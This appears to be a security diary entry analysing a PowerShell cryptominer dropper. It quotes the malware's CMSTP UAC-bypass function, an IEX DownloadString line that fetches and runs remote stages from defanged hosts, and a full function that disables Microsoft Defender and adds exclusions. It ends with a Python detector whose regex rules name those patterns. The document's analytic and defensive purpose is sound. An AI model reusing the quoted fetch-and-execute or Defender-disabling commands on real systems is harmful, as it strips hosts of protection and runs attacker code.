Bypassing UAC to Install a Cryptominer, (Thu, Dec 26th)

First of all, Merry Christmas to all our readers! I hope you're enjoying the break with your family and friends! Even if everything slows down in this period, there is always malicious activity ongoing. I found a small PowerShell script that looked interesting for a quick diary. To begin with, it has a VT score of 2/60[1]. It installs a cryptominer, and its most interesting feature is the use of a classic technique to bypass UAC[2].

To achieve this, it uses the cmstp.exe tool and a DLL. This binary is used by the Microsoft Connection Manager Profile Installer to deploy .inf files. It is located in C:\Windows\System32\ or C:\Windows\SysWOW64\, which are listed as trusted directories by AppLocker.

First, the script kills any existing cmstp.exe processes running:

cmd.exe /C taskkill /IM cmstp.exe /f;

Then, it implements a function to bypass UAC by loading a malicious DLL:

function Bypass-UAC
{
    Param([Parameter(Mandatory = $true, Position = 0)][string]$Command)
    if(-not ([System.Management.Automation.PSTypeName]"CMSTPBypass").Type)
    {
        $a = $a + "<base64_data>";
        $a = $a + "<base64_data>";
        ...
        $a = $a + "<base64_data>";
        [Reflection.Assembly]::Load([Convert]::FromBase64String("$a")) | Out-Null
    }
    [CMSTPBypass]::Execute($Command)
}

This technique is not new and has been borrowed by the developers from another source[3]. The loaded DLL is well-known on VT and has a decent score: 26/66[4].

This function is used to grab and launch extra PowerShell scripts:

IEX (New-Object Net.WebClient).DownloadString('hxxp://trsurl[.]com/sa/UAC_WIN_10_Run_Miner')

Multiple URLs are visited and extra code downloaded:

hxxp://trsurl[.]com/sa/UAC_WIN_10_Run_Miner > hxxps://hastebin[.]com/raw/odazicisiq > hxxp://trsurl[.]com/sa/Miner > hxxps://hastebin[.]com/raw/sidodoquse

The miner is a simple XMRIG with user ID: 42PkwcWLCjheUAaXy2h6CndY9DoKvv4pQ6QogCxgnFFF268ueYNb2FXiLCgQeds64jAytuaXzFTctbsujZYzUuaRVhn8Cjd. Besides the classic function to “seek & hunt” unwanted processes (AV and other competing miners), there is an interesting function used to disable Microsoft Defender:

function disable_defender{
    Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction Ignore;
    Set-MpPreference -DisableBehaviorMonitoring $true -ErrorAction Ignore;
    Set-MpPreference -DisableBlockAtFirstSeen $true -ErrorAction Ignore;
    Set-MpPreference -DisableIOAVProtection $true -ErrorAction Ignore;
    Set-MpPreference -DisablePrivacyMode $true -ErrorAction Ignore;
    Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true -ErrorAction Ignore;
    Set-MpPreference -DisableArchiveScanning $true -ErrorAction Ignore;
    Set-MpPreference -DisableIntrusionPreventionSystem $true -ErrorAction Ignore;
    Set-MpPreference -DisableScriptScanning $true -ErrorAction Ignore;
    Set-MpPreference -SubmitSamplesConsent 2 -ErrorAction Ignore;
    Set-MpPreference -MAPSReporting 0 -ErrorAction Ignore;
    Set-MpPreference -HighThreatDefaultAction 6 -Force -ErrorAction Ignore;
    Set-MpPreference -ModerateThreatDefaultAction 6 -ErrorAction Ignore;
    Set-MpPreference -LowThreatDefaultAction 6 -ErrorAction Ignore;
    Set-MpPreference -SevereThreatDefaultAction 6 -ErrorAction Ignore;
    Add-MpPreference -ExclusionPath C:\Users\Public\Libraries\ -ErrorAction Ignore;
    Add-MpPreference -ExclusionPath C:\Users\Public\Libraries -ErrorAction Ignore;
    Add-MpPreference -ExclusionPath C:\ProgramData\win32.zip -ErrorAction Ignore;
    Add-MpPreference -ExclusionPath C:\ProgramData\x32\ -ErrorAction Ignore;
    Add-MpPreference -ExclusionPath C:\ProgramData\win64.zip -ErrorAction Ignore;
    Add-MpPreference -ExclusionPath C:\ProgramData\x64\ -ErrorAction Ignore;
    Add-MpPreference -ExclusionPath C:\ProgramData\x64\xmrig-2.3.1-gcc-win64\xmrig-2.3.1-gcc-win64\xmrig-2.3.1 -ErrorAction Ignore;
    Add-MpPreference -ExclusionPath C:\ProgramData\x32\xmrig-2.3.1-gcc-win32\xmrig-2.3.1-gcc-win32\xmrig-2.3.1 -ErrorAction Ignore;
    Add-MpPreference -ExclusionProcess "xmrig.exe" -ErrorAction Ignore;
    Add-MpPreference -ExclusionExtension ".exe" -ErrorAction Ignore;
}
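From a detection point of view, everything this script does leaves a trace in PowerShell script block logging (Event ID 4104): the taskkill of cmstp.exe, the reflective Assembly.Load of a base64 blob, the IEX/DownloadString staging, and the burst of Set-MpPreference/Add-MpPreference calls that switch Defender off and carve out exclusions. The following Python script is an added example (not part of the diary, and not the attacker's code) that scores a script block against those patterns and extracts which Defender features were disabled and which exclusions were added. The sample script block inside it is constructed in the style of the one described above, with the base64 blob, the URL and the rule weights being assumptions of this example rather than values from the page.

```python
import re

# Constructed sample in the style of the script described in the diary. The base64
# blob and the download URL are placeholders, not the original values.
SUSPICIOUS_SCRIPT = r'''
cmd.exe /C taskkill /IM cmstp.exe /f;
function Bypass-UAC {
    if(-not ([System.Management.Automation.PSTypeName]"CMSTPBypass").Type) {
        $a = $a + "QUFBQUFB";
        [Reflection.Assembly]::Load([Convert]::FromBase64String("$a")) | Out-Null
    }
    [CMSTPBypass]::Execute($Command)
}
IEX (New-Object Net.WebClient).DownloadString('http://stage2.example.invalid/run')
Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction Ignore;
Set-MpPreference -DisableScriptScanning $true -ErrorAction Ignore;
Add-MpPreference -ExclusionPath C:\ProgramData\x64\ -ErrorAction Ignore;
Add-MpPreference -ExclusionProcess "xmrig.exe" -ErrorAction Ignore;
Add-MpPreference -ExclusionExtension ".exe" -ErrorAction Ignore;
'''

# Constructed benign sample: an administrator excluding a single build directory.
BENIGN_SCRIPT = r'''
Add-MpPreference -ExclusionPath C:\Build\artifacts\
Get-MpPreference | Select-Object ExclusionPath
'''

# (name, regex, weight). The weights are an assumption of this example, not a
# vendor scoring scheme; tune them against your own script block logs.
RULES = [
    ("cmstp_kill",          r"taskkill\s+/IM\s+cmstp\.exe", 2),
    ("cmstp_bypass_class",  r"CMSTPBypass", 3),
    ("inmem_assembly_load", r"Reflection\.Assembly\]::Load\(\[Convert\]::FromBase64String", 3),
    ("download_exec",       r"IEX\s*\(?\s*New-Object\s+Net\.WebClient\)\.DownloadString", 2),
    ("defender_disable",    r"Set-MpPreference\s+-Disable\w+\s+\$true", 2),
    ("defender_exclusion",  r"Add-MpPreference\s+-Exclusion(?:Path|Process|Extension)", 1),
    ("xmrig_reference",     r"xmrig", 3),
]
WEIGHTS = {name: weight for name, _pattern, weight in RULES}


def find_indicators(script):
    """Return {rule_name: [line numbers]} for every rule that matches at least one line."""
    hits = {}
    for lineno, line in enumerate(script.splitlines(), start=1):
        for name, pattern, _weight in RULES:
            if re.search(pattern, line, re.IGNORECASE):
                hits.setdefault(name, []).append(lineno)
    return hits


def defender_changes(script):
    """List the Defender features switched off and the exclusions added by the script."""
    disabled = re.findall(r"Set-MpPreference\s+-(Disable\w+)\s+\$true", script, re.IGNORECASE)
    exclusions = re.findall(
        r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)\s+\"?([^\s\";]+)",
        script, re.IGNORECASE)
    return {"disabled": disabled, "exclusions": exclusions}


def score(script):
    """Sum the weight of each distinct rule that fired (a rule counts once, however often it matches)."""
    return sum(WEIGHTS[name] for name in find_indicators(script))


def verdict(script, threshold=6):
    """'suspicious' once the combined weight reaches the threshold, otherwise 'benign'."""
    return "suspicious" if score(script) >= threshold else "benign"


if __name__ == "__main__":
    for label, text in (("sample", SUSPICIOUS_SCRIPT), ("benign", BENIGN_SCRIPT)):
        print(label, verdict(text), score(text), find_indicators(text))
    print(defender_changes(SUSPICIOUS_SCRIPT))
```

The scoring is deliberately cumulative: a single Add-MpPreference exclusion is normal administrative work and scores 1, while the combination of killing cmstp.exe, loading an assembly from base64 in memory and disabling real-time monitoring in the same script block is what pushes the verdict over the threshold. The defender_changes() output is the part worth feeding into an incident ticket, since it tells you exactly which settings to restore and which exclusion paths to remove on the affected host.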

[1] https://www.virustotal.com/gui/file/c5ec59f873fe31025703855a2406845199d2da221738d3c76daa3b9996c6cd14/detection
[2] https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works
[3] https://www.who-ami.net/how-to-bypass-uac-in-newer-windows-versions/
[4] https://www.virustotal.com/gui/file/da9fc045098c3502920dee3fe65660de0049792307605f89b08361e28ce74dad/details

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant